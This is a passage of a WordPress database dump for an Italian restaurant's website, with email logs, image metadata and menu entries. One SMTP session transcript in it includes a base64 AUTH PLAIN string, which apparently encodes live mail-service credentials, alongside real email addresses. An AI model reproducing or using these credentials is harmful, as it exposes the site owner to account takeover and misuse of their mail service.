href=3D\"https://www.risto=\r\nrantesolymar.it/mio-account/\" rel=3D\"nofollow\" style=3D\"color: #557da1;=\r\n font-weight: normal; text-decoration: underline;\">https://www.ristorant=\r\nesolymar.it/mio-account/</a></p>=0A=0A<p style=3D\"margin: 0 0 16px;\">We=\r\n look forward to seeing you soon.</p>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- End C=\r\nontent -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=\r\n=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D=\r\n\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=\r\n=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=\r\n=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; border-radius: 6p=\r\nx;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\"=\r\n cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\"=\r\n id=3D\"credit\" style=3D\'border-radius: 6px; border: 0; color: #969696; f=\r\nont-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font=\r\n-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">So=\r\nl Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09<=\r\n/table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=\r\n=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=\r\n=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK queued as f4897fd9-a6cb-4dc8-b2cd-88cdedd4e81a\r\n'),(44634,3987,'solution','All good, mail sent.'),(44635,3987,'success','1'),(44636,3987,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(44637,3987,'to_header','webmaster@baldisserri.com'),(44638,3987,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(44639,3987,'original_to','webmaster@baldisserri.com'),(44640,3987,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(44641,3987,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from version 3.1.2 to 3.1.3)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(44642,3987,'original_headers',''),(44643,3987,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.19 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <c920d99cc815c4f0ccc88c1d9554fdb3@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Fri, 22 Jan 2021 12:24:15 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- News=\r\nletter, SMTP, Email marketing and Subscribe forms by Sendinblue (from ve=\r\nrsion 3.1.2 to 3.1.3)=0A=0A=0AIf you experience any issues or need suppo=\r\nrt, the volunteers in the WordPress.org support forums may be able to he=\r\nlp.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK queued as 7a6a812e-1207-498b-8f9c-e12fac3d0e31\r\n'),(44644,3988,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(51293,4239,'_wp_attached_file','2018/07/blog-post-img-5.jpg'),(51993,2770,'_wp_attached_file','2018/09/landing-vector-img-11.png'),(51994,2770,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:384;s:6:\"height\";i:200;s:4:\"file\";s:33:\"2018/09/landing-vector-img-11.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-11-300x156.png\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-vector-img-11-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-11-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51995,2735,'_wp_attachment_image_alt','v'),(51996,2948,'_wp_attached_file','2018/09/landing-img-4-1.jpg'),(51997,2948,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:27:\"2018/09/landing-img-4-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"landing-img-4-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51998,2949,'_wp_attachment_image_alt','d'),(51999,2770,'_wp_attachment_image_alt',''),(52000,2948,'_wp_attachment_image_alt','d'),(52001,2785,'_wp_attached_file','2018/09/landing-vector-img-14.png'),(52002,2785,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:581;s:6:\"height\";i:614;s:4:\"file\";s:33:\"2018/09/landing-vector-img-14.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-14-284x300.png\";s:5:\"width\";i:284;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-14-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-vector-img-14-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-14-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-14-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-14-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52003,2748,'_wp_attached_file','2018/09/landing-backround-img-1.jpg'),(52004,2748,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1200;s:4:\"file\";s:35:\"2018/09/landing-backround-img-1.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"landing-backround-img-1-1024x640.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"landing-backround-img-1-1536x960.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:36:\"landing-backround-img-1-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:36:\"landing-backround-img-1-650x1200.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:37:\"landing-backround-img-1-1300x1200.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-backround-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-600x375.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-600x375.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-backround-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52005,2973,'_wp_attached_file','2018/09/landing-print-img-1-1.jpg'),(52006,2973,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:734;s:6:\"height\";i:878;s:4:\"file\";s:33:\"2018/09/landing-print-img-1-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-251x300.jpg\";s:5:\"width\";i:251;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-734x650.jpg\";s:5:\"width\";i:734;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-650x878.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:878;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-print-img-1-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52007,2785,'_wp_attachment_image_alt','v'),(52008,2771,'_wp_attached_file','2018/09/landing-img-10.jpg'),(52009,2771,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-10.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-10-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-10-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-10-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-10-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-10-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-10-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-10-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-10-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(44899,3989,'_menu_item_type','custom'),(44900,3989,'_menu_item_menu_item_parent','0'),(44901,3989,'_menu_item_object_id','3989'),(44902,3989,'_menu_item_object','custom'),(44903,3989,'_menu_item_target',''),(44904,3989,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44905,3989,'_menu_item_xfn',''),(44906,3989,'_menu_item_url','#'),(44907,3989,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44908,3989,'_menu_item_icon','null'),(44909,3990,'_menu_item_type','custom'),(44910,3990,'_menu_item_menu_item_parent','0'),(44911,3990,'_menu_item_object_id','3990'),(44912,3990,'_menu_item_object','custom'),(44913,3990,'_menu_item_target',''),(44914,3990,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44915,3990,'_menu_item_xfn',''),(44916,3990,'_menu_item_url','#'),(44917,3990,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44918,3990,'_menu_item_icon','null'),(44919,3991,'_menu_item_type','custom'),(44920,3991,'_menu_item_menu_item_parent','0'),(44921,3991,'_menu_item_object_id','3991'),(44922,3991,'_menu_item_object','custom'),(44923,3991,'_menu_item_target',''),(44924,3991,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44925,3991,'_menu_item_xfn',''),(44926,3991,'_menu_item_url','#'),(44927,3991,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44928,3991,'_menu_item_icon','null'),(44929,3992,'_menu_item_type','custom'),(44930,3992,'_menu_item_menu_item_parent','0'),(44931,3992,'_menu_item_object_id','3992'),(44932,3992,'_menu_item_object','custom'),(44933,3992,'_menu_item_target',''),(44934,3992,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44935,3992,'_menu_item_xfn',''),(44936,3992,'_menu_item_url','#'),(44937,3992,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44938,3992,'_menu_item_icon','null'),(44939,3993,'_menu_item_type','custom'),(44940,3993,'_menu_item_menu_item_parent','0'),(44941,3993,'_menu_item_object_id','3993'),(44942,3993,'_menu_item_object','custom'),(44943,3993,'_menu_item_target',''),(44944,3993,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44945,3993,'_menu_item_xfn',''),(44946,3993,'_menu_item_url','#'),(44947,3993,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44948,3993,'_menu_item_icon','null'),(44949,3994,'_menu_item_type','custom'),(44950,3994,'_menu_item_menu_item_parent','0'),(44951,3994,'_menu_item_object_id','3994'),(44952,3994,'_menu_item_object','custom'),(44953,3994,'_menu_item_target',''),(44954,3994,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44955,3994,'_menu_item_xfn',''),(44956,3994,'_menu_item_url','#'),(44957,3994,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44958,3994,'_menu_item_icon','null'),(44959,3995,'_menu_item_type','custom'),(44960,3995,'_menu_item_menu_item_parent','0'),(44961,3995,'_menu_item_object_id','3995'),(44962,3995,'_menu_item_object','custom'),(44963,3995,'_menu_item_target',''),(44964,3995,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44965,3995,'_menu_item_xfn',''),(44966,3995,'_menu_item_url','#'),(44967,3995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44968,3995,'_menu_item_icon','null'),(44969,3996,'_menu_item_type','custom'),(44970,3996,'_menu_item_menu_item_parent','0'),(44971,3996,'_menu_item_object_id','3996'),(44972,3996,'_menu_item_object','custom'),(44973,3996,'_menu_item_target',''),(44974,3996,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44975,3996,'_menu_item_xfn',''),(44976,3996,'_menu_item_url','#'),(44977,3996,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44978,3996,'_menu_item_icon','null'),(44979,3997,'_menu_item_type','custom'),(44980,3997,'_menu_item_menu_item_parent','0'),(44981,3997,'_menu_item_object_id','3997'),(44982,3997,'_menu_item_object','custom'),(44983,3997,'_menu_item_target',''),(44984,3997,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44985,3997,'_menu_item_xfn',''),(44986,3997,'_menu_item_url','#'),(44987,3997,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44988,3997,'_menu_item_icon','null'),(44989,3998,'_menu_item_type','custom'),(44990,3998,'_menu_item_menu_item_parent','0'),(44991,3998,'_menu_item_object_id','3998'),(44992,3998,'_menu_item_object','custom'),(44993,3998,'_menu_item_target',''),(44994,3998,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44995,3998,'_menu_item_xfn',''),(44996,3998,'_menu_item_url','#'),(44997,3998,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44998,3998,'_menu_item_icon','null'),(44999,3999,'_menu_item_type','custom'),(45000,3999,'_menu_item_menu_item_parent','0'),(45001,3999,'_menu_item_object_id','3999'),(45002,3999,'_menu_item_object','custom'),(45003,3999,'_menu_item_target',''),(45004,3999,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(4